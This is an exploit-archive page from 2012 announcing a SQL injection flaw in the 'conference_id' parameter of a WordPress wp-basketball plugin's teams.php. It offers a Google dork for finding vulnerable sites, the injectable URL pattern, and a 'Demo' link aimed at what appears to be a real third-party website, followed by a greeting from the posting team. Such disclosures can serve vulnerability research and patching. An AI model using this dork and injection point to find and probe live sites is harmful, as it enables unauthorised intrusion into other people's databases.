Home / exploitsPDF  

WordPress WP-Basketball SQL Injection

Posted on 27 November 2012

# Exploit Title: Wordpress wp-basketball theme SQL injection # # Google Dork: inurl :wp-content/plugins/wp-basketball/teams.php?id= # # Date: 2012-26-11 # Exploit Author: Ashiyane Digital Security Team # # Discovered by : Amirh03in # # Tested on: Linux # # Security Risk : High - SQL Injection # =================================== =================================== # Location: http://site.com/wp-content/plugins/wp-basketball/teams.php?id=[numbers]&conference_id=[SQL] # # Demo : http://www.inboundpass.com/wp-content/plugins/wp-basketball/teams.php?id=11&conference_id=13%27 # ======================================= ======================================= Greetz to: My Lord ALLAH =======================================

 

TOP